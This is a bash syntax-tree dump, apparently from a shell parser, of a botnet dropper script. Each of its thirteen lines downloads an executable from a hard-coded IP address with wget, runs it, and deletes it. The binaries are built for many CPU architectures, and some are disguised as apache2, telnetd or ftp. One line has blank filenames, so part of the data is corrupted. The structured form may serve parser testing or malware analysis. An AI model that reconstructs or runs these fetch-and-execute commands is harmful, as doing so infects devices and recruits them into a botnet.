ListNode(lineno=2, pos=(12, 149), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 101), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 101), word='http://46.166.185.34/pl0xmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(101, 102)),
  CommandNode(lineno=2, pos=(103, 120), parts=[
    WordNode(lineno=2, pos=(103, 108), word='chmod'),
    WordNode(lineno=2, pos=(109, 111), word='+x'),
    WordNode(lineno=2, pos=(112, 120), word='pl0xmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(120, 121)),
  CommandNode(lineno=2, pos=(122, 132), parts=[
    WordNode(lineno=2, pos=(122, 132), word='./pl0xmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(132, 133)),
  CommandNode(lineno=2, pos=(134, 149), parts=[
    WordNode(lineno=2, pos=(134, 136), word='rm'),
    WordNode(lineno=2, pos=(137, 140), word='-rf'),
    WordNode(lineno=2, pos=(141, 149), word='pl0xmips'),
  ]),
])
ListNode(lineno=3, pos=(150, 295), parts=[
  CommandNode(lineno=3, pos=(150, 157), parts=[
    WordNode(lineno=3, pos=(150, 152), word='cd'),
    WordNode(lineno=3, pos=(153, 157), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(158, 160)),
  CommandNode(lineno=3, pos=(161, 172), parts=[
    WordNode(lineno=3, pos=(161, 163), word='cd'),
    WordNode(lineno=3, pos=(164, 172), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(173, 175)),
  CommandNode(lineno=3, pos=(176, 183), parts=[
    WordNode(lineno=3, pos=(176, 178), word='cd'),
    WordNode(lineno=3, pos=(179, 183), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(184, 186)),
  CommandNode(lineno=3, pos=(187, 195), parts=[
    WordNode(lineno=3, pos=(187, 189), word='cd'),
    WordNode(lineno=3, pos=(190, 195), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(196, 198)),
  CommandNode(lineno=3, pos=(199, 203), parts=[
    WordNode(lineno=3, pos=(199, 201), word='cd'),
    WordNode(lineno=3, pos=(202, 203), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(203, 204)),
  CommandNode(lineno=3, pos=(205, 241), parts=[
    WordNode(lineno=3, pos=(205, 209), word='wget'),
    WordNode(lineno=3, pos=(210, 241), word='http://46.166.185.34/pl0xmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(241, 242)),
  CommandNode(lineno=3, pos=(243, 262), parts=[
    WordNode(lineno=3, pos=(243, 248), word='chmod'),
    WordNode(lineno=3, pos=(249, 251), word='+x'),
    WordNode(lineno=3, pos=(252, 262), word='pl0xmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(262, 263)),
  CommandNode(lineno=3, pos=(264, 276), parts=[
    WordNode(lineno=3, pos=(264, 276), word='./pl0xmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(276, 277)),
  CommandNode(lineno=3, pos=(278, 295), parts=[
    WordNode(lineno=3, pos=(278, 280), word='rm'),
    WordNode(lineno=3, pos=(281, 284), word='-rf'),
    WordNode(lineno=3, pos=(285, 295), word='pl0xmipsel'),
  ]),
])
ListNode(lineno=4, pos=(296, 429), parts=[
  CommandNode(lineno=4, pos=(296, 303), parts=[
    WordNode(lineno=4, pos=(296, 298), word='cd'),
    WordNode(lineno=4, pos=(299, 303), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(304, 306)),
  CommandNode(lineno=4, pos=(307, 318), parts=[
    WordNode(lineno=4, pos=(307, 309), word='cd'),
    WordNode(lineno=4, pos=(310, 318), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(319, 321)),
  CommandNode(lineno=4, pos=(322, 329), parts=[
    WordNode(lineno=4, pos=(322, 324), word='cd'),
    WordNode(lineno=4, pos=(325, 329), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(330, 332)),
  CommandNode(lineno=4, pos=(333, 341), parts=[
    WordNode(lineno=4, pos=(333, 335), word='cd'),
    WordNode(lineno=4, pos=(336, 341), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(342, 344)),
  CommandNode(lineno=4, pos=(345, 349), parts=[
    WordNode(lineno=4, pos=(345, 347), word='cd'),
    WordNode(lineno=4, pos=(348, 349), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(349, 350)),
  CommandNode(lineno=4, pos=(351, 384), parts=[
    WordNode(lineno=4, pos=(351, 355), word='wget'),
    WordNode(lineno=4, pos=(356, 384), word='http://46.166.185.34/pl0xsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(384, 385)),
  CommandNode(lineno=4, pos=(386, 402), parts=[
    WordNode(lineno=4, pos=(386, 391), word='chmod'),
    WordNode(lineno=4, pos=(392, 394), word='+x'),
    WordNode(lineno=4, pos=(395, 402), word='pl0xsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(402, 403)),
  CommandNode(lineno=4, pos=(404, 413), parts=[
    WordNode(lineno=4, pos=(404, 413), word='./pl0xsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(413, 414)),
  CommandNode(lineno=4, pos=(415, 429), parts=[
    WordNode(lineno=4, pos=(415, 417), word='rm'),
    WordNode(lineno=4, pos=(418, 421), word='-rf'),
    WordNode(lineno=4, pos=(422, 429), word='pl0xsh4'),
  ]),
])
ListNode(lineno=5, pos=(430, 563), parts=[
  CommandNode(lineno=5, pos=(430, 437), parts=[
    WordNode(lineno=5, pos=(430, 432), word='cd'),
    WordNode(lineno=5, pos=(433, 437), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(438, 440)),
  CommandNode(lineno=5, pos=(441, 452), parts=[
    WordNode(lineno=5, pos=(441, 443), word='cd'),
    WordNode(lineno=5, pos=(444, 452), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(453, 455)),
  CommandNode(lineno=5, pos=(456, 463), parts=[
    WordNode(lineno=5, pos=(456, 458), word='cd'),
    WordNode(lineno=5, pos=(459, 463), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(464, 466)),
  CommandNode(lineno=5, pos=(467, 475), parts=[
    WordNode(lineno=5, pos=(467, 469), word='cd'),
    WordNode(lineno=5, pos=(470, 475), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(476, 478)),
  CommandNode(lineno=5, pos=(479, 483), parts=[
    WordNode(lineno=5, pos=(479, 481), word='cd'),
    WordNode(lineno=5, pos=(482, 483), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(483, 484)),
  CommandNode(lineno=5, pos=(485, 518), parts=[
    WordNode(lineno=5, pos=(485, 489), word='wget'),
    WordNode(lineno=5, pos=(490, 518), word='http://46.166.185.34/pl0xx64'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(518, 519)),
  CommandNode(lineno=5, pos=(520, 536), parts=[
    WordNode(lineno=5, pos=(520, 525), word='chmod'),
    WordNode(lineno=5, pos=(526, 528), word='+x'),
    WordNode(lineno=5, pos=(529, 536), word='pl0xx64'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(536, 537)),
  CommandNode(lineno=5, pos=(538, 547), parts=[
    WordNode(lineno=5, pos=(538, 547), word='./pl0xx64'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(547, 548)),
  CommandNode(lineno=5, pos=(549, 563), parts=[
    WordNode(lineno=5, pos=(549, 551), word='rm'),
    WordNode(lineno=5, pos=(552, 555), word='-rf'),
    WordNode(lineno=5, pos=(556, 563), word='pl0xx64'),
  ]),
])
ListNode(lineno=6, pos=(564, 713), parts=[
  CommandNode(lineno=6, pos=(564, 571), parts=[
    WordNode(lineno=6, pos=(564, 566), word='cd'),
    WordNode(lineno=6, pos=(567, 571), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(572, 574)),
  CommandNode(lineno=6, pos=(575, 586), parts=[
    WordNode(lineno=6, pos=(575, 577), word='cd'),
    WordNode(lineno=6, pos=(578, 586), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(587, 589)),
  CommandNode(lineno=6, pos=(590, 597), parts=[
    WordNode(lineno=6, pos=(590, 592), word='cd'),
    WordNode(lineno=6, pos=(593, 597), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(598, 600)),
  CommandNode(lineno=6, pos=(601, 609), parts=[
    WordNode(lineno=6, pos=(601, 603), word='cd'),
    WordNode(lineno=6, pos=(604, 609), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(610, 612)),
  CommandNode(lineno=6, pos=(613, 617), parts=[
    WordNode(lineno=6, pos=(613, 615), word='cd'),
    WordNode(lineno=6, pos=(616, 617), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(617, 618)),
  CommandNode(lineno=6, pos=(619, 656), parts=[
    WordNode(lineno=6, pos=(619, 623), word='wget'),
    WordNode(lineno=6, pos=(624, 656), word='http://46.166.185.34/kittyphones'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(656, 657)),
  CommandNode(lineno=6, pos=(658, 678), parts=[
    WordNode(lineno=6, pos=(658, 663), word='chmod'),
    WordNode(lineno=6, pos=(664, 666), word='+x'),
    WordNode(lineno=6, pos=(667, 678), word='kittyphones'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(678, 679)),
  CommandNode(lineno=6, pos=(680, 693), parts=[
    WordNode(lineno=6, pos=(680, 693), word='./kittyphones'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(693, 694)),
  CommandNode(lineno=6, pos=(695, 713), parts=[
    WordNode(lineno=6, pos=(695, 697), word='rm'),
    WordNode(lineno=6, pos=(698, 701), word='-rf'),
    WordNode(lineno=6, pos=(702, 713), word='kittyphones'),
  ]),
])
ListNode(lineno=7, pos=(714, 851), parts=[
  CommandNode(lineno=7, pos=(714, 721), parts=[
    WordNode(lineno=7, pos=(714, 716), word='cd'),
    WordNode(lineno=7, pos=(717, 721), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(722, 724)),
  CommandNode(lineno=7, pos=(725, 736), parts=[
    WordNode(lineno=7, pos=(725, 727), word='cd'),
    WordNode(lineno=7, pos=(728, 736), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(737, 739)),
  CommandNode(lineno=7, pos=(740, 747), parts=[
    WordNode(lineno=7, pos=(740, 742), word='cd'),
    WordNode(lineno=7, pos=(743, 747), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(748, 750)),
  CommandNode(lineno=7, pos=(751, 759), parts=[
    WordNode(lineno=7, pos=(751, 753), word='cd'),
    WordNode(lineno=7, pos=(754, 759), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(760, 762)),
  CommandNode(lineno=7, pos=(763, 767), parts=[
    WordNode(lineno=7, pos=(763, 765), word='cd'),
    WordNode(lineno=7, pos=(766, 767), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(767, 768)),
  CommandNode(lineno=7, pos=(769, 803), parts=[
    WordNode(lineno=7, pos=(769, 773), word='wget'),
    WordNode(lineno=7, pos=(774, 803), word='http://46.166.185.34/pl0xi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(803, 804)),
  CommandNode(lineno=7, pos=(805, 822), parts=[
    WordNode(lineno=7, pos=(805, 810), word='chmod'),
    WordNode(lineno=7, pos=(811, 813), word='+x'),
    WordNode(lineno=7, pos=(814, 822), word='pl0xi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(822, 823)),
  CommandNode(lineno=7, pos=(824, 834), parts=[
    WordNode(lineno=7, pos=(824, 834), word='./pl0xi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(834, 835)),
  CommandNode(lineno=7, pos=(836, 851), parts=[
    WordNode(lineno=7, pos=(836, 838), word='rm'),
    WordNode(lineno=7, pos=(839, 842), word='-rf'),
    WordNode(lineno=7, pos=(843, 851), word='pl0xi686'),
  ]),
])
ListNode(lineno=8, pos=(852, 985), parts=[
  CommandNode(lineno=8, pos=(852, 859), parts=[
    WordNode(lineno=8, pos=(852, 854), word='cd'),
    WordNode(lineno=8, pos=(855, 859), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(860, 862)),
  CommandNode(lineno=8, pos=(863, 874), parts=[
    WordNode(lineno=8, pos=(863, 865), word='cd'),
    WordNode(lineno=8, pos=(866, 874), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(875, 877)),
  CommandNode(lineno=8, pos=(878, 885), parts=[
    WordNode(lineno=8, pos=(878, 880), word='cd'),
    WordNode(lineno=8, pos=(881, 885), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(886, 888)),
  CommandNode(lineno=8, pos=(889, 897), parts=[
    WordNode(lineno=8, pos=(889, 891), word='cd'),
    WordNode(lineno=8, pos=(892, 897), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(898, 900)),
  CommandNode(lineno=8, pos=(901, 905), parts=[
    WordNode(lineno=8, pos=(901, 903), word='cd'),
    WordNode(lineno=8, pos=(904, 905), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(905, 906)),
  CommandNode(lineno=8, pos=(907, 940), parts=[
    WordNode(lineno=8, pos=(907, 911), word='wget'),
    WordNode(lineno=8, pos=(912, 940), word='http://46.166.185.34/pl0xppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(940, 941)),
  CommandNode(lineno=8, pos=(942, 958), parts=[
    WordNode(lineno=8, pos=(942, 947), word='chmod'),
    WordNode(lineno=8, pos=(948, 950), word='+x'),
    WordNode(lineno=8, pos=(951, 958), word='pl0xppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(958, 959)),
  CommandNode(lineno=8, pos=(960, 969), parts=[
    WordNode(lineno=8, pos=(960, 969), word='./pl0xppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(969, 970)),
  CommandNode(lineno=8, pos=(971, 985), parts=[
    WordNode(lineno=8, pos=(971, 973), word='rm'),
    WordNode(lineno=8, pos=(974, 977), word='-rf'),
    WordNode(lineno=8, pos=(978, 985), word='pl0xppc'),
  ]),
])
ListNode(lineno=9, pos=(986, 1103), parts=[
  CommandNode(lineno=9, pos=(986, 993), parts=[
    WordNode(lineno=9, pos=(986, 988), word='cd'),
    WordNode(lineno=9, pos=(989, 993), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(994, 996)),
  CommandNode(lineno=9, pos=(997, 1008), parts=[
    WordNode(lineno=9, pos=(997, 999), word='cd'),
    WordNode(lineno=9, pos=(1000, 1008), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1009, 1011)),
  CommandNode(lineno=9, pos=(1012, 1019), parts=[
    WordNode(lineno=9, pos=(1012, 1014), word='cd'),
    WordNode(lineno=9, pos=(1015, 1019), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1020, 1022)),
  CommandNode(lineno=9, pos=(1023, 1031), parts=[
    WordNode(lineno=9, pos=(1023, 1025), word='cd'),
    WordNode(lineno=9, pos=(1026, 1031), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1032, 1034)),
  CommandNode(lineno=9, pos=(1035, 1039), parts=[
    WordNode(lineno=9, pos=(1035, 1037), word='cd'),
    WordNode(lineno=9, pos=(1038, 1039), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1039, 1040)),
  CommandNode(lineno=9, pos=(1041, 1070), parts=[
    WordNode(lineno=9, pos=(1041, 1045), word='wget'),
    WordNode(lineno=9, pos=(1046, 1070), word='http://46.166.185.34/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1070, 1071)),
  CommandNode(lineno=9, pos=(1072, 1084), parts=[
    WordNode(lineno=9, pos=(1072, 1077), word='chmod'),
    WordNode(lineno=9, pos=(1078, 1080), word='+x'),
    WordNode(lineno=9, pos=(1081, 1084), word='ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1084, 1085)),
  CommandNode(lineno=9, pos=(1086, 1091), parts=[
    WordNode(lineno=9, pos=(1086, 1091), word='./ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1091, 1092)),
  CommandNode(lineno=9, pos=(1093, 1103), parts=[
    WordNode(lineno=9, pos=(1093, 1095), word='rm'),
    WordNode(lineno=9, pos=(1096, 1099), word='-rf'),
    WordNode(lineno=9, pos=(1100, 1103), word='ftp'),
  ]),
])
ListNode(lineno=10, pos=(1104, 1225), parts=[
  CommandNode(lineno=10, pos=(1104, 1111), parts=[
    WordNode(lineno=10, pos=(1104, 1106), word='cd'),
    WordNode(lineno=10, pos=(1107, 1111), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1112, 1114)),
  CommandNode(lineno=10, pos=(1115, 1126), parts=[
    WordNode(lineno=10, pos=(1115, 1117), word='cd'),
    WordNode(lineno=10, pos=(1118, 1126), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1127, 1129)),
  CommandNode(lineno=10, pos=(1130, 1137), parts=[
    WordNode(lineno=10, pos=(1130, 1132), word='cd'),
    WordNode(lineno=10, pos=(1133, 1137), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1138, 1140)),
  CommandNode(lineno=10, pos=(1141, 1149), parts=[
    WordNode(lineno=10, pos=(1141, 1143), word='cd'),
    WordNode(lineno=10, pos=(1144, 1149), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1150, 1152)),
  CommandNode(lineno=10, pos=(1153, 1157), parts=[
    WordNode(lineno=10, pos=(1153, 1155), word='cd'),
    WordNode(lineno=10, pos=(1156, 1157), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1157, 1158)),
  CommandNode(lineno=10, pos=(1159, 1189), parts=[
    WordNode(lineno=10, pos=(1159, 1163), word='wget'),
    WordNode(lineno=10, pos=(1164, 1189), word='http://46.166.185.34/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1189, 1190)),
  CommandNode(lineno=10, pos=(1191, 1204), parts=[
    WordNode(lineno=10, pos=(1191, 1196), word='chmod'),
    WordNode(lineno=10, pos=(1197, 1199), word='+x'),
    WordNode(lineno=10, pos=(1200, 1204), word='pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1204, 1205)),
  CommandNode(lineno=10, pos=(1206, 1212), parts=[
    WordNode(lineno=10, pos=(1206, 1212), word='./pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1212, 1213)),
  CommandNode(lineno=10, pos=(1214, 1225), parts=[
    WordNode(lineno=10, pos=(1214, 1216), word='rm'),
    WordNode(lineno=10, pos=(1217, 1220), word='-rf'),
    WordNode(lineno=10, pos=(1221, 1225), word='pftp'),
  ]),
])
ListNode(lineno=11, pos=(1226, 1367), parts=[
  CommandNode(lineno=11, pos=(1226, 1233), parts=[
    WordNode(lineno=11, pos=(1226, 1228), word='cd'),
    WordNode(lineno=11, pos=(1229, 1233), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1234, 1236)),
  CommandNode(lineno=11, pos=(1237, 1248), parts=[
    WordNode(lineno=11, pos=(1237, 1239), word='cd'),
    WordNode(lineno=11, pos=(1240, 1248), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1249, 1251)),
  CommandNode(lineno=11, pos=(1252, 1259), parts=[
    WordNode(lineno=11, pos=(1252, 1254), word='cd'),
    WordNode(lineno=11, pos=(1255, 1259), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1260, 1262)),
  CommandNode(lineno=11, pos=(1263, 1271), parts=[
    WordNode(lineno=11, pos=(1263, 1265), word='cd'),
    WordNode(lineno=11, pos=(1266, 1271), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1272, 1274)),
  CommandNode(lineno=11, pos=(1275, 1279), parts=[
    WordNode(lineno=11, pos=(1275, 1277), word='cd'),
    WordNode(lineno=11, pos=(1278, 1279), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1279, 1280)),
  CommandNode(lineno=11, pos=(1281, 1316), parts=[
    WordNode(lineno=11, pos=(1281, 1285), word='wget'),
    WordNode(lineno=11, pos=(1286, 1316), word='http://46.166.185.34/pl0xsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1316, 1317)),
  CommandNode(lineno=11, pos=(1318, 1336), parts=[
    WordNode(lineno=11, pos=(1318, 1323), word='chmod'),
    WordNode(lineno=11, pos=(1324, 1326), word='+x'),
    WordNode(lineno=11, pos=(1327, 1336), word='pl0xsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1336, 1337)),
  CommandNode(lineno=11, pos=(1338, 1349), parts=[
    WordNode(lineno=11, pos=(1338, 1349), word='./pl0xsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1349, 1350)),
  CommandNode(lineno=11, pos=(1351, 1367), parts=[
    WordNode(lineno=11, pos=(1351, 1353), word='rm'),
    WordNode(lineno=11, pos=(1354, 1357), word='-rf'),
    WordNode(lineno=11, pos=(1358, 1367), word='pl0xsparc'),
  ]),
])
ListNode(lineno=12, pos=(1368, 1485), parts=[
  CommandNode(lineno=12, pos=(1368, 1375), parts=[
    WordNode(lineno=12, pos=(1368, 1370), word='cd'),
    WordNode(lineno=12, pos=(1371, 1375), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1376, 1378)),
  CommandNode(lineno=12, pos=(1379, 1390), parts=[
    WordNode(lineno=12, pos=(1379, 1381), word='cd'),
    WordNode(lineno=12, pos=(1382, 1390), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1391, 1393)),
  CommandNode(lineno=12, pos=(1394, 1401), parts=[
    WordNode(lineno=12, pos=(1394, 1396), word='cd'),
    WordNode(lineno=12, pos=(1397, 1401), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1402, 1404)),
  CommandNode(lineno=12, pos=(1405, 1413), parts=[
    WordNode(lineno=12, pos=(1405, 1407), word='cd'),
    WordNode(lineno=12, pos=(1408, 1413), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1414, 1416)),
  CommandNode(lineno=12, pos=(1417, 1421), parts=[
    WordNode(lineno=12, pos=(1417, 1419), word='cd'),
    WordNode(lineno=12, pos=(1420, 1421), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1421, 1422)),
  CommandNode(lineno=12, pos=(1423, 1452), parts=[
    WordNode(lineno=12, pos=(1423, 1427), word='wget'),
    WordNode(lineno=12, pos=(1428, 1452), word='http://46.166.185.34/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1452, 1453)),
  CommandNode(lineno=12, pos=(1454, 1466), parts=[
    WordNode(lineno=12, pos=(1454, 1459), word='chmod'),
    WordNode(lineno=12, pos=(1460, 1462), word='+x'),
    WordNode(lineno=12, pos=(1463, 1466), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1466, 1467)),
  CommandNode(lineno=12, pos=(1468, 1473), parts=[
    WordNode(lineno=12, pos=(1468, 1473), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1473, 1474)),
  CommandNode(lineno=12, pos=(1475, 1485), parts=[
    WordNode(lineno=12, pos=(1475, 1477), word='rm'),
    WordNode(lineno=12, pos=(1478, 1481), word='-rf'),
    WordNode(lineno=12, pos=(1482, 1485), word=' '),
  ]),
])
ListNode(lineno=13, pos=(1486, 1619), parts=[
  CommandNode(lineno=13, pos=(1486, 1493), parts=[
    WordNode(lineno=13, pos=(1486, 1488), word='cd'),
    WordNode(lineno=13, pos=(1489, 1493), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1494, 1496)),
  CommandNode(lineno=13, pos=(1497, 1508), parts=[
    WordNode(lineno=13, pos=(1497, 1499), word='cd'),
    WordNode(lineno=13, pos=(1500, 1508), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1509, 1511)),
  CommandNode(lineno=13, pos=(1512, 1519), parts=[
    WordNode(lineno=13, pos=(1512, 1514), word='cd'),
    WordNode(lineno=13, pos=(1515, 1519), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1520, 1522)),
  CommandNode(lineno=13, pos=(1523, 1531), parts=[
    WordNode(lineno=13, pos=(1523, 1525), word='cd'),
    WordNode(lineno=13, pos=(1526, 1531), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1532, 1534)),
  CommandNode(lineno=13, pos=(1535, 1539), parts=[
    WordNode(lineno=13, pos=(1535, 1537), word='cd'),
    WordNode(lineno=13, pos=(1538, 1539), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1539, 1540)),
  CommandNode(lineno=13, pos=(1541, 1574), parts=[
    WordNode(lineno=13, pos=(1541, 1545), word='wget'),
    WordNode(lineno=13, pos=(1546, 1574), word='http://46.166.185.34/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1574, 1575)),
  CommandNode(lineno=13, pos=(1576, 1592), parts=[
    WordNode(lineno=13, pos=(1576, 1581), word='chmod'),
    WordNode(lineno=13, pos=(1582, 1584), word='+x'),
    WordNode(lineno=13, pos=(1585, 1592), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1592, 1593)),
  CommandNode(lineno=13, pos=(1594, 1603), parts=[
    WordNode(lineno=13, pos=(1594, 1603), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1603, 1604)),
  CommandNode(lineno=13, pos=(1605, 1619), parts=[
    WordNode(lineno=13, pos=(1605, 1607), word='rm'),
    WordNode(lineno=13, pos=(1608, 1611), word='-rf'),
    WordNode(lineno=13, pos=(1612, 1619), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(1620, 1753), parts=[
  CommandNode(lineno=14, pos=(1620, 1627), parts=[
    WordNode(lineno=14, pos=(1620, 1622), word='cd'),
    WordNode(lineno=14, pos=(1623, 1627), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1628, 1630)),
  CommandNode(lineno=14, pos=(1631, 1642), parts=[
    WordNode(lineno=14, pos=(1631, 1633), word='cd'),
    WordNode(lineno=14, pos=(1634, 1642), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1643, 1645)),
  CommandNode(lineno=14, pos=(1646, 1653), parts=[
    WordNode(lineno=14, pos=(1646, 1648), word='cd'),
    WordNode(lineno=14, pos=(1649, 1653), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1654, 1656)),
  CommandNode(lineno=14, pos=(1657, 1665), parts=[
    WordNode(lineno=14, pos=(1657, 1659), word='cd'),
    WordNode(lineno=14, pos=(1660, 1665), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1666, 1668)),
  CommandNode(lineno=14, pos=(1669, 1673), parts=[
    WordNode(lineno=14, pos=(1669, 1671), word='cd'),
    WordNode(lineno=14, pos=(1672, 1673), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1673, 1674)),
  CommandNode(lineno=14, pos=(1675, 1708), parts=[
    WordNode(lineno=14, pos=(1675, 1679), word='wget'),
    WordNode(lineno=14, pos=(1680, 1708), word='http://46.166.185.34/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1708, 1709)),
  CommandNode(lineno=14, pos=(1710, 1726), parts=[
    WordNode(lineno=14, pos=(1710, 1715), word='chmod'),
    WordNode(lineno=14, pos=(1716, 1718), word='+x'),
    WordNode(lineno=14, pos=(1719, 1726), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1726, 1727)),
  CommandNode(lineno=14, pos=(1728, 1737), parts=[
    WordNode(lineno=14, pos=(1728, 1737), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1737, 1738)),
  CommandNode(lineno=14, pos=(1739, 1753), parts=[
    WordNode(lineno=14, pos=(1739, 1741), word='rm'),
    WordNode(lineno=14, pos=(1742, 1745), word='-rf'),
    WordNode(lineno=14, pos=(1746, 1753), word='telnetd'),
  ]),
])
